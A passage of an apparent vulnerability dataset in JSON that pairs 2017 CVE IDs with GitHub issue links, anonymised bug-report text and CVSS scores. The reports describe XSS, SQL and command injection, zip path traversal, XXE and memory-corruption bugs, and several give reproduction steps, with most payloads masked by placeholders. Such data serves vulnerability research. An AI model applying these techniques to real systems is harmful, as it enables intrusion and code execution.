  4872. "severity": "MEDIUM",
  4873. "baseScore": 5.3,
  4874. "impactScore": 1.4,
  4875. "exploitabilityScore": 3.9
  4876. },
  4877. {
  4878. "CVE_ID": "CVE-2017-1000418",
  4879. "Issue_Url_old": "https://github.com/Mindwerks/wildmidi/issues/178",
  4880. "Issue_Url_new": "https://github.com/mindwerks/wildmidi/issues/178",
  4881. "Repo_new": "mindwerks/wildmidi",
  4882. "Issue_Created_At": "2017-08-04T00:11:17Z",
  4883. "description": "heap buffer overflow in APITAG Hi. I found a heap buffer overflow in wildmidi. Please confirm. Thanks. Summary: heap buffer overflow Browser/OS: Ubuntu NUMBERTAG bit Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG or Run wildmidi as valgrind. APITAG the following command : ./wildmidi APITAG o /dev/null APITAG download : APITAG URLTAG ERRORTAG",
  4884. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4885. "severity": "HIGH",
  4886. "baseScore": 7.8,
  4887. "impactScore": 5.9,
  4888. "exploitabilityScore": 1.8
  4889. },
  4890. {
  4891. "CVE_ID": "CVE-2017-1000420",
  4892. "Issue_Url_old": "https://github.com/syncthing/syncthing/issues/4286",
  4893. "Issue_Url_new": "https://github.com/syncthing/syncthing/issues/4286",
  4894. "Repo_new": "syncthing/syncthing",
  4895. "Issue_Created_At": "2017-08-07T05:56:43Z",
  4896. "description": "Placeholder issue. To be replaced with real content tomorrow.",
  4897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4898. "severity": "HIGH",
  4899. "baseScore": 7.5,
  4900. "impactScore": 3.6,
  4901. "exploitabilityScore": 3.9
  4902. },
  4903. {
  4904. "CVE_ID": "CVE-2017-1000421",
  4905. "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/114",
  4906. "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/114",
  4907. "Repo_new": "kohler/gifsicle",
  4908. "Issue_Created_At": "2017-08-09T18:11:53Z",
  4909. "description": "Use After Free bug in gifview (tested with the latest version NUMBERTAG When viewing a gif figure: APITAG gfi = APITAG // URLTAG > A new object gfi is allocated APITAG APITAG gfi)); // URLTAG > gfi is added into gfs >images (assuming with inde NUMBERTAG gfi >refcount increases by NUMBERTAG APITAG read_image(grr, &gfc, gfi, read_flags); // URLTAG > Try to read the image > Assuming this call fails and return NUMBERTAG due to a corrupted figure) APITAG APITAG gfs >nimages NUMBERTAG URLTAG > APITAG >images[gfs >nimages NUMBERTAG APITAG >images[gfs >nimages NUMBERTAG i.e., APITAG > gfi is freed APITAG goto done // URLTAG APITAG NUMBERTAG gfi is used multiple times after being freed. // URLTAG APITAG gfi is freed again. // URLTAG",
  4910. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4911. "severity": "CRITICAL",
  4912. "baseScore": 9.8,
  4913. "impactScore": 5.9,
  4914. "exploitabilityScore": 3.9
  4915. },
  4916. {
  4917. "CVE_ID": "CVE-2017-1000426",
  4918. "Issue_Url_old": "https://github.com/mapproxy/mapproxy/issues/322",
  4919. "Issue_Url_new": "https://github.com/mapproxy/mapproxy/issues/322",
  4920. "Repo_new": "mapproxy/mapproxy",
  4921. "Issue_Created_At": "2017-08-14T10:50:55Z",
  4922. "description": "Update demo service. TODO",
  4923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4924. "severity": "MEDIUM",
  4925. "baseScore": 6.1,
  4926. "impactScore": 2.7,
  4927. "exploitabilityScore": 2.8
  4928. },
  4929. {
  4930. "CVE_ID": "CVE-2017-1000428",
  4931. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/35",
  4932. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/35",
  4933. "Repo_new": "flatcore/flatcore-cms",
  4934. "Issue_Created_At": "2017-08-12T14:48:20Z",
  4935. "description": "Multiple XSS (reflected and stored). Hey, I found NUMBERTAG SS in your application NUMBERTAG Reflected XSS in FILETAG / FILETAG Your FILETAG is vulnerable to reflected xss URLTAG This is because you use $_SERVER FILETAG This is verified with the github version as well as with Version NUMBERTAG Stored XSS in logfile Version NUMBERTAG from your website is also vulnerable to stored xss by the following request: GET FILETAG HTTP NUMBERTAG Host: APITAG User Agent: APITAG alert NUMBERTAG APITAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG This is triggered when the administrator opens the log view. FILETAG Cheers",
  4936. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4937. "severity": "MEDIUM",
  4938. "baseScore": 6.1,
  4939. "impactScore": 2.7,
  4940. "exploitabilityScore": 2.8
  4941. },
  4942. {
  4943. "CVE_ID": "CVE-2017-1000433",
  4944. "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/451",
  4945. "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/451",
  4946. "Repo_new": "identitypython/pysaml2",
  4947. "Issue_Created_At": "2017-09-09T09:04:08Z",
  4948. "description": "Running python with optimizations makes APITAG accept any password for any user. On the current master branch, the APITAG class relies on an assert statement to check the user's password: URLTAG The assert is supposed to raise an exception if the password doesn't match. This is insecure: running python with optimizations enabled (either via the APITAG or APITAG flags, or with the PYTHONOPTIMIZE environment variable URLTAG will remove all such assertions URLTAG . This means that no exception will be raised on an incorrect password, and the APITAG will accept any password for any user. It would be better to have an explicit check that raises an exception to avoid this problem.",
  4949. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4950. "severity": "HIGH",
  4951. "baseScore": 8.1,
  4952. "impactScore": 5.9,
  4953. "exploitabilityScore": 2.2
  4954. },
  4955. {
  4956. "CVE_ID": "CVE-2017-1000437",
  4957. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/186",
  4958. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/186",
  4959. "Repo_new": "marcobambini/gravity",
  4960. "Issue_Created_At": "2017-09-04T23:24:15Z",
  4961. "description": "Buffer Overflow (operator_string_add) . Summary: Gravity is vulnerable to a Stack Buffer Overflow in the operator_string_add function. ASAN is saying it is a \"buffer underflow\" but by looking at gravity under GDB we can see that we are gaining an arbitrary write. This opens up a security risk as an attacker can use this to write past a static buffer and achieve code execution. Execution: ./gravity APITAG GDB: FILETAG ASAN: ERRORTAG POC: CODETAG",
  4962. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4963. "severity": "CRITICAL",
  4964. "baseScore": 9.8,
  4965. "impactScore": 5.9,
  4966. "exploitabilityScore": 3.9
  4967. },
  4968. {
  4969. "CVE_ID": "CVE-2017-1000443",
  4970. "Issue_Url_old": "https://github.com/Eleix/openhacker/issues/5",
  4971. "Issue_Url_new": "https://github.com/booth-f/openhacker/issues/5",
  4972. "Repo_new": "booth-f/openhacker",
  4973. "Issue_Created_At": "2017-09-19T17:26:42Z",
  4974. "description": "XSS, SQL Injection and logic problem in APITAG APITAG Not sanitized, used in a query later, used in a message later. SQL Injection & XSS. $details .= $_POST['details']; XSS, used in the message later. Logic problem: To deduce the amount the hacker is sending to another hacker, the amount is being multiplied by NUMBERTAG so if he's sending NUMBERTAG the game treats it as if its NUMBERTAG What happens if the original amount I sent is NUMBERTAG and it gets multiplied by NUMBERTAG It turns into a positive integer NUMBERTAG and I gain free cash.",
  4975. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4976. "severity": "MEDIUM",
  4977. "baseScore": 6.1,
  4978. "impactScore": 2.7,
  4979. "exploitabilityScore": 2.8
  4980. },
  4981. {
  4982. "CVE_ID": "CVE-2017-1000444",
  4983. "Issue_Url_old": "https://github.com/Eleix/openhacker/issues/4",
  4984. "Issue_Url_new": "https://github.com/booth-f/openhacker/issues/4",
  4985. "Repo_new": "booth-f/openhacker",
  4986. "Issue_Created_At": "2017-09-19T17:08:48Z",
  4987. "description": "SQL Injection in APITAG As lgin.htm tries to grab the user's IP, it prioritizes HTTP_X_FORWARDED_FOR before REMOTE_ADDR. REMOTE_ADDR can be trusted not to be manipulated by the user; however, HTTP_X_FORWARDED_FOR is very easily manipulated. It needs to be validated as a valid IP address. Look into APITAG",
  4988. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4989. "severity": "CRITICAL",
  4990. "baseScore": 9.8,
  4991. "impactScore": 5.9,
  4992. "exploitabilityScore": 3.9
  4993. },
  4994. {
  4995. "CVE_ID": "CVE-2017-1000445",
  4996. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/775",
  4997. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/775",
  4998. "Repo_new": "imagemagick/imagemagick",
  4999. "Issue_Created_At": "2017-09-22T12:48:49Z",
  5000. "description": "Null Pointer Dereference at APITAG of APITAG Hi all, APITAG NUMBERTAG still exists in the latest development branch APITAG might return NULL if APITAG fails, then it will cause a Null Pointer Dereference. Similar suspicious code pieces might also have the same issue: URLTAG URLTAG URLTAG ERRORTAG Regards, Alex, APITAG Inc.",
  5001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5002. "severity": "MEDIUM",
  5003. "baseScore": 6.5,
  5004. "impactScore": 3.6,
  5005. "exploitabilityScore": 2.8
  5006. },
  5007. {
  5008. "CVE_ID": "CVE-2017-1000448",
  5009. "Issue_Url_old": "https://github.com/structured-data/linter/issues/41",
  5010. "Issue_Url_new": "https://github.com/structured-data/linter/issues/41",
  5011. "Repo_new": "structured-data/linter",
  5012. "Issue_Created_At": "2017-09-25T09:29:03Z",
  5013. "description": "The URL input doesn't check the user inputs. Hi, When I used your online tool to check the RDFa attributes of my own website, I got the following error: error ERRORTAG Failed to open APITAG No such file or directory @ rb_sysopen APITAG The problem here is that I didn't precise APITAG . Consequently, the software tried to find APITAG as a local file. This issue leads to a directory traversal attack, allowing an attacker to disclose information about the remote system. For example, it is possible to know if a directory exists or not (with APITAG as input): error Errno::EISDIR: Is a directory @ io_fread PATHTAG When used on a file which the format is not recognised by the parser, the error message tends to leak some precious information (with APITAG as input): validation PATHTAG Errors found during processing validation PATHTAG ERROR [line NUMBERTAG Lexer error: With input APITAG APITAG LTS, Trusty Tahr\" ID=ubuntu ID_LIKE=debian APITAG NUMBERTAG Invalid token \"NAME= Ubuntu \": {:production=>:statement, :token=>\"NAME= Ubuntu \"}: validation PATHTAG FATAL recovery: statement: [\".\"] For example, an attacker could use this vulnerability to reveal the installed and running services on the remote host (with APITAG as input): validation PATHTAG Errors found during processing validation PATHTAG ERROR [line NUMBERTAG Lexer error: With input 'client] port NUMBERTAG socket = PATHTAG Here is entries for some specific progr': Invalid token \"client]\": APITAG :token=>\"client]\"}: validation PATHTAG FATAL recovery: APITAG \";\" validation PATHTAG FATAL recovery: APITAG \"]\" validation PATHTAG FATAL recovery: triples: [\".\"] validation PATHTAG FATAL recovery: statement: [\".\"] We know now that the APITAG server is installed on the remote server and listens on port NUMBERTAG To check if it is currently running or not (with APITAG as input): error ERRORTAG Failed to open PATHTAG No such file or directory @ rb_sysopen PATHTAG To fix this issue, the user 
inputs need to be checked to ensure that they are real URL addresses and not local files.",
  5014. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  5015. "severity": "HIGH",
  5016. "baseScore": 7.5,
  5017. "impactScore": 3.6,
  5018. "exploitabilityScore": 3.9
  5019. },
  5020. {
  5021. "CVE_ID": "CVE-2017-1000450",
  5022. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9723",
  5023. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9723",
  5024. "Repo_new": "opencv/opencv",
  5025. "Issue_Created_At": "2017-09-26T22:19:03Z",
  5026. "description": "Out of bounds write causes Segmentation Fault. System information (version) APITAG NUMBERTAG the latest commit NUMBERTAG d NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description An invalid write occurs in the APITAG and APITAG functions in PATHTAG POC URLTAG Steps to reproduce ERRORTAG Crash Details ERRORTAG",
  5027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5028. "severity": "HIGH",
  5029. "baseScore": 8.8,
  5030. "impactScore": 5.9,
  5031. "exploitabilityScore": 2.8
  5032. },
  5033. {
  5034. "CVE_ID": "CVE-2017-1000459",
  5035. "Issue_Url_old": "https://github.com/leanote/leanote/issues/676",
  5036. "Issue_Url_new": "https://github.com/leanote/leanote/issues/676",
  5037. "Repo_new": "leanote/leanote",
  5038. "Issue_Created_At": "2017-10-17T18:41:49Z",
  5039. "description": "Multiple XSS. There are multiple XSS in markdown notes you can trigger them with following payloads CODETAG",
  5040. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5041. "severity": "MEDIUM",
  5042. "baseScore": 6.1,
  5043. "impactScore": 2.7,
  5044. "exploitabilityScore": 2.8
  5045. },
  5046. {
  5047. "CVE_ID": "CVE-2017-1000461",
  5048. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/11683",
  5049. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/11683",
  5050. "Repo_new": "brave/browser-laptop",
  5051. "Issue_Created_At": "2017-10-26T17:26:03Z",
  5052. "description": "Fingerprinting protections bypassable. Description Many of the current fingerprinting protections rely on removing references to methods from the global object. However, you can get alternate references to the same methods by inserting a configured iframe element and grabbing the references off APITAG or APITAG . Steps to Reproduce CODETAG Actual result: You can get references to the fingerprinting related methods. Expected result: You shouldn't be able to get to these methods. Reproduces how often NUMBERTAG Brave Version All versions Reproducible on current live release: Yes",
  5053. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
  5054. "severity": "MEDIUM",
  5055. "baseScore": 4.7,
  5056. "impactScore": 1.4,
  5057. "exploitabilityScore": 2.8
  5058. },
  5059. {
  5060. "CVE_ID": "CVE-2017-1000462",
  5061. "Issue_Url_old": "https://github.com/BookStackApp/BookStack/issues/575",
  5062. "Issue_Url_new": "https://github.com/bookstackapp/bookstack/issues/575",
  5063. "Repo_new": "bookstackapp/bookstack",
  5064. "Issue_Created_At": "2017-10-26T19:52:01Z",
  5065. "description": "Stored Cross Site Scripting. For Bug Reports APITAG Version APITAG in settings, Please don't put 'latest') : APITAG NUMBERTAG PHP Version NUMBERTAG APITAG Version: Ver NUMBERTAG Distrib NUMBERTAG for Linu NUMBERTAG Expected Behavior Filter out JS code. Any author can write Cross site scripting payloads and cause issues for the users/ Current Behavior JS code is not filtered within the page creation Steps to Reproduce NUMBERTAG Create a book NUMBERTAG Create a page NUMBERTAG While editing the page, choose to edit the source code and add APITAG NUMBERTAG isit the page (alert box should pop up)",
  5066. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5067. "severity": "MEDIUM",
  5068. "baseScore": 5.4,
  5069. "impactScore": 2.7,
  5070. "exploitabilityScore": 2.3
  5071. },
  5072. {
  5073. "CVE_ID": "CVE-2017-1000463",
  5074. "Issue_Url_old": "https://github.com/Leafpub/leafpub/issues/125",
  5075. "Issue_Url_new": "https://github.com/leafpub/leafpub/issues/125",
  5076. "Repo_new": "leafpub/leafpub",
  5077. "Issue_Created_At": "2017-10-28T10:56:29Z",
  5078. "description": "Stored Cross site Scripting (XSS). Issue Summary Stored Cross site Scripting (XSS) in the page editor causing any author to get arbitrary javascript execution in any viewer's browser. Steps to Reproduce Tell us how to replicate the problem NUMBERTAG Log in to a user with writer permissions NUMBERTAG Choose to edit a blog post NUMBERTAG Choose to embed a resource. A side panel will appear asking you for code NUMBERTAG Enter the following payload in the side panel: APITAG , and save the blog NUMBERTAG iew the blog and observe an alert box pop up. Additional info Leafpub version NUMBERTAG PHP version NUMBERTAG Affected browsers: All that can run javascript Operating system: Ubuntu",
  5079. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5080. "severity": "MEDIUM",
  5081. "baseScore": 5.4,
  5082. "impactScore": 2.7,
  5083. "exploitabilityScore": 2.3
  5084. },
  5085. {
  5086. "CVE_ID": "CVE-2017-1000465",
  5087. "Issue_Url_old": "https://github.com/sulu/sulu-standard/issues/835",
  5088. "Issue_Url_new": "https://github.com/sulu/sulu-standard/issues/835",
  5089. "Repo_new": "sulu/sulu-standard",
  5090. "Issue_Created_At": "2017-10-29T02:54:23Z",
  5091. "description": "Stored Cross site Scripting (XSS) in page creation. | Q | A | | | Bug? | Yes | New Feature? | no | Sulu Version NUMBERTAG Browser Version | Chrome Actual Behavior Sulu saves the code unsanitised and allows arbitrary execution of javascript. Expected Behavior Sulu should remove the javascript payload as it does for most others. Steps to Reproduce NUMBERTAG Log in as a user with page editing permissions NUMBERTAG Choose to edit an article NUMBERTAG Add a new block with type text NUMBERTAG Click the source code button on the editor and enter the following code: APITAG NUMBERTAG Save the code Possible Solutions Check iframe src prior to adding to the page.",
  5092. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5093. "severity": "MEDIUM",
  5094. "baseScore": 5.4,
  5095. "impactScore": 2.7,
  5096. "exploitabilityScore": 2.3
  5097. },
  5098. {
  5099. "CVE_ID": "CVE-2017-1000466",
  5100. "Issue_Url_old": "https://github.com/invoiceninja/invoiceninja/issues/1727",
  5101. "Issue_Url_new": "https://github.com/invoiceninja/invoiceninja/issues/1727",
  5102. "Repo_new": "invoiceninja/invoiceninja",
  5103. "Issue_Created_At": "2017-10-30T00:07:46Z",
  5104. "description": "Stored Cross site Scripting in Client's Name. Issue Anyone with the permission to change a client's name can use that parameter to gain arbitrary execution of javascript. Anyone who can create an invoice will be affected by this payload. Steps to reproduce NUMBERTAG Create a client NUMBERTAG Change the client's name, first name, and last name to the following payload: APITAG NUMBERTAG Go to create an invoice NUMBERTAG Select that client. Observe an alert box has popped up.",
  5105. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5106. "severity": "MEDIUM",
  5107. "baseScore": 5.4,
  5108. "impactScore": 2.7,
  5109. "exploitabilityScore": 2.3
  5110. },
  5111. {
  5112. "CVE_ID": "CVE-2017-1000467",
  5113. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/209",
  5114. "Issue_Url_new": "https://github.com/lavalite/cms/issues/209",
  5115. "Repo_new": "lavalite/cms",
  5116. "Issue_Created_At": "2017-10-30T03:32:47Z",
  5117. "description": "Stored Cross site Scripting (XSS). Issue Stored XSS found within the blog creation page. This allows attackers to get arbitrary execution of javascript code. Steps to reproduce NUMBERTAG Log into a user's account with blog writing permissions (like role user in the demo website NUMBERTAG Go to the blogs page NUMBERTAG Create a blog page, with the contents of the page as follows: ERRORTAG Please ensure this payload is entered using the source code view of the blog editor",
  5118. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5119. "severity": "MEDIUM",
  5120. "baseScore": 5.4,
  5121. "impactScore": 2.7,
  5122. "exploitabilityScore": 2.3
  5123. },
  5124. {
  5125. "CVE_ID": "CVE-2017-1000469",
  5126. "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1845",
  5127. "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1845",
  5128. "Repo_new": "cobbler/cobbler",
  5129. "Issue_Created_At": "2017-10-19T08:15:37Z",
  5130. "description": "The Repos feature is vulnerable to a command injection attack. In the Repos feature, Cobbler does not sanitize its user input; as a result, it is possible to execute arbitrary commands by specifying a malformed repository mirror during its creation or editing. As the service runs as root, it is thus possible to leak sensitive information and gain remote root access on the machine that runs Cobbler. Sample of a malicious input, entered in the Mirror field in the Adding a Repo form: APITAG Then a Reposync action has to be executed to trigger the malicious command to run. Its output can be seen in the log of the action, which is in the Events page. To fix this issue, we would suggest filtering the user input to remove invalid path characters. Additionally, it would be advisable to run the rsync command, if not the entire service, as an unprivileged user. This issue has been verified on versions up to NUMBERTAG",
  5131. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5132. "severity": "CRITICAL",
  5133. "baseScore": 9.8,
  5134. "impactScore": 5.9,
  5135. "exploitabilityScore": 3.9
  5136. },
  5137. {
  5138. "CVE_ID": "CVE-2017-1000472",
  5139. "Issue_Url_old": "https://github.com/pocoproject/poco/issues/1968",
  5140. "Issue_Url_new": "https://github.com/pocoproject/poco/issues/1968",
  5141. "Repo_new": "pocoproject/poco",
  5142. "Issue_Created_At": "2017-11-01T17:43:53Z",
  5143. "description": "Zip Decompress Parent Path Injection. By manipulation of the Zip input file header, the contents of the zip archive can be written to an arbitrary parent path of the user. Expected behavior Throw an exception if filename contains a parent directory reference. APITAG APITAG should check if the filename contains a tilde character. Actual behavior By inserting a tilde slash (~/) in the filename area of the zip header, files can be written to the user's home directory. Steps to reproduce the problem Use the sample unzip samle application as follows: ERRORTAG _ FILETAG _ contains a file _foo_. _foo_ includes the string _bar_ vuln.zip hexdump: CODETAG After executing the program, a file _o_ with the content _bar_ is written in the home of the user. APITAG (_o_ is just an example name) POCO version APITAG Compiler and version clang version NUMBERTAG PATHTAG ) Operating system and version NUMBERTAG APITAG NUMBERTAG SMP Mon Oct NUMBERTAG UTC NUMBERTAG APITAG Security implications Due to the current behavior of the Zip Decompress mechanism it is possible to write files in parent arbitrary user directories. For example, a manipulated _.bashrc_ could be inserted into the user's home. Cheers Stephan Zeisberg",
  5144. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  5145. "severity": "MEDIUM",
  5146. "baseScore": 6.5,
  5147. "impactScore": 3.6,
  5148. "exploitabilityScore": 2.8
  5149. },
  5150. {
  5151. "CVE_ID": "CVE-2017-1000473",
  5152. "Issue_Url_old": "https://github.com/afaqurk/linux-dash/issues/447",
  5153. "Issue_Url_new": "https://github.com/tariqbuilds/linux-dash/issues/447",
  5154. "Repo_new": "tariqbuilds/linux-dash",
  5155. "Issue_Created_At": "2017-11-09T07:21:04Z",
  5156. "description": "Command injection vulnerabilities. There are multiple command injection vulnerabilities in the current version linux dash NUMBERTAG The python and node versions of the servers are vulnerable to code injection. For example, with the python server running on my local host, navigating to the URL URLTAG will output the listing of the current directory. FILETAG In the case of the node version, by using a node client commands can be executed directly. For example: FILETAG At this point, it is pretty trivial to gain a shell on the server. And since the readme mentions that it may require sudo, there's a good chance that shell will be a root shell NUMBERTAG In FILETAG , the final two lines of the script are as follows: APITAG Since all the various versions of the servers (go, node, php, and python) all simply pass an argument to this shell script, some limited command injection is possible. For example, any linux commands that do not need an argument. For example, when running the python version of the server on my localhost the URL URLTAG will return: FILETAG Depending on the permissions of the user running the server, it may be possible to do things like APITAG the system by shutting it down.",
  5157. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5158. "severity": "HIGH",
  5159. "baseScore": 7.8,
  5160. "impactScore": 5.9,
  5161. "exploitabilityScore": 1.8
  5162. },
  5163. {
  5164. "CVE_ID": "CVE-2017-1000476",
  5165. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/867",
  5166. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/867",
  5167. "Repo_new": "imagemagick/imagemagick",
  5168. "Issue_Created_At": "2017-11-17T03:36:06Z",
  5169. "description": "CPU exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG when debug found dds_info >mipmapcount is very large CODETAG testcase: URLTAG",
  5170. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5171. "severity": "MEDIUM",
  5172. "baseScore": 6.5,
  5173. "impactScore": 3.6,
  5174. "exploitabilityScore": 2.8
  5175. },
  5176. {
  5177. "CVE_ID": "CVE-2017-1000477",
  5178. "Issue_Url_old": "https://github.com/pravednik/xmlBundle/issues/2",
  5179. "Issue_Url_new": "https://github.com/pravednik/xmlbundle/issues/2",
  5180. "Repo_new": "pravednik/xmlbundle",
  5181. "Issue_Created_At": "2017-11-20T11:16:58Z",
  5182. "description": "XXE APITAG Security Vulnerability. APITAG APITAG is vulnerable to an XXE APITAG vulnerability. The code with the APITAG is given below: ERRORTAG This can be used to create very large strings, which can eventually APITAG the system. Due to the working of APITAG , we cannot run system commands using the package (tested with my limited knowledge though). However, entities can be used easily. Hope this helps!",
  5183. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5184. "severity": "HIGH",
  5185. "baseScore": 7.5,
  5186. "impactScore": 3.6,
  5187. "exploitabilityScore": 3.9
  5188. },
  5189. {
  5190. "CVE_ID": "CVE-2017-1000478",
  5191. "Issue_Url_old": "https://github.com/elabftw/elabftw/issues/531",
  5192. "Issue_Url_new": "https://github.com/elabftw/elabftw/issues/531",
  5193. "Repo_new": "elabftw/elabftw",
  5194. "Issue_Created_At": "2017-11-20T11:48:14Z",
  5195. "description": "Stored Cross site Scripting Bypassing APITAG Editor. Description of the problem Anyone who can edit an experiment can gain arbitrary execution of APITAG stored within an experiment. All you have to do is use a web interception proxy, like Burp Suite, and intercept the saving of an experiment. Edit the infos section of the experiment and add in ERRORTAG . An alert box will show up, which proves the arbitrary execution of APITAG code. Information Elabftw version (visible in Sysadmin panel NUMBERTAG Installation method (git, docker or zip archive) : git Operating system + version : Ubuntu NUMBERTAG Browser used (firefox/chrome) : firefox For git/zip installation method: PHP version NUMBERTAG APITAG version NUMBERTAG Webserver (apache/nginx) + version : Apache NUMBERTAG",
  5196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5197. "severity": "MEDIUM",
  5198. "baseScore": 5.4,
  5199. "impactScore": 2.7,
  5200. "exploitabilityScore": 2.3
  5201. },
  5202. {
  5203. "CVE_ID": "CVE-2017-1000485",
  5204. "Issue_Url_old": "https://github.com/nylas-mail-lives/nylas-mail/issues/181",
  5205. "Issue_Url_new": "https://github.com/nylas-mail-lives/nylas-mail/issues/181",
  5206. "Repo_new": "nylas-mail-lives/nylas-mail",
  5207. "Issue_Created_At": "2017-11-29T05:14:40Z",
  5208. "description": "Set more restrictive permission on .nylas mail. On APITAG by default the APITAG directory has NUMBERTAG permission, so other users can use APITAG and APITAG to retrieve my credentials. A CVE was assigned for a similar vulnerability URLTAG in Telegram Desktop, should I request a CVE for this issue?",
  5209. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5210. "severity": "HIGH",
  5211. "baseScore": 7.8,
  5212. "impactScore": 5.9,
  5213. "exploitabilityScore": 1.8
  5214. },
  5215. {
  5216. "CVE_ID": "CVE-2017-1000486",
  5217. "Issue_Url_old": "https://github.com/primefaces/primefaces/issues/1152",
  5218. "Issue_Url_new": "https://github.com/primefaces/primefaces/issues/1152",
  5219. "Repo_new": "primefaces/primefaces",
  5220. "Issue_Created_At": "2016-02-15T18:16:21Z",
  5221. "description": "EL Injection in Primefaces NUMBERTAG As already shared privately last year PATHTAG is vulnerable to remotely exploitable code execution through EL Injection You can find more information here: FILETAG",
  5222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5223. "severity": "CRITICAL",
  5224. "baseScore": 9.8,
  5225. "impactScore": 5.9,
  5226. "exploitabilityScore": 3.9
  5227. },
  5228. {
  5229. "CVE_ID": "CVE-2017-1000491",
  5230. "Issue_Url_old": "https://github.com/rhysd/Shiba/issues/42",
  5231. "Issue_Url_new": "https://github.com/rhysd/shiba/issues/42",
  5232. "Repo_new": "rhysd/shiba",
  5233. "Issue_Created_At": "2017-11-25T19:07:19Z",
  5234. "description": "XSS to RCE vulnerability report. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working POC that I dont want to post publicly. Please contact me at EMAILTAG",
  5235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5236. "severity": "MEDIUM",
  5237. "baseScore": 6.1,
  5238. "impactScore": 2.7,
  5239. "exploitabilityScore": 2.8
  5240. },
  5241. {
  5242. "CVE_ID": "CVE-2017-1000492",
  5243. "Issue_Url_old": "https://github.com/leanote/leanote/issues/695",
  5244. "Issue_Url_new": "https://github.com/leanote/leanote/issues/695",
  5245. "Repo_new": "leanote/leanote",
  5246. "Issue_Created_At": "2017-11-28T10:06:48Z",
  5247. "description": "XSS to code execution. This issue should not be closed before being fixed. Also I have made a request on full disclosure on the issue. URLTAG",
  5248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5249. "severity": "MEDIUM",
  5250. "baseScore": 6.1,
  5251. "impactScore": 2.7,
  5252. "exploitabilityScore": 2.8
  5253. },
  5254. {
  5255. "CVE_ID": "CVE-2017-1000494",
  5256. "Issue_Url_old": "https://github.com/miniupnp/miniupnp/issues/268",
  5257. "Issue_Url_new": "https://github.com/miniupnp/miniupnp/issues/268",
  5258. "Repo_new": "miniupnp/miniupnp",
  5259. "Issue_Created_At": "2017-12-09T16:08:00Z",
